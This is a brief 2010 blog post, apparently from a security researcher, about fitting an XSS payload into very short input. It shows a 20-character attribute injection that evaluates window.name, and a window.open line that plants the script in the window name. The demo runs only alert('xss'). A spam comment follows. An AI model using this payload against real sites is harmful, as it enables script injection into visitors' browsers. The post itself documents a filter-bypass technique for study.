Wednesday, January 13, 2010

XSS and Ultra Short Urls II

Since I've written the first post about my efforts to load external javascript in under 30 characters, I've learned several new tricks to reference "external" javascript. The shortest one is this (20 characters):
"onfocus="eval(name)
This will only work if the window's name property has been set to hold your "external" javascript:
window.open('http://some.site.com/with/xss/vulns?input="onfocus="eval(name)', "alert('xss')")

1 comment:

  1. Did you know you can shorten your links with AdFly and receive cash for every visitor to your shortened links.

    ReplyDelete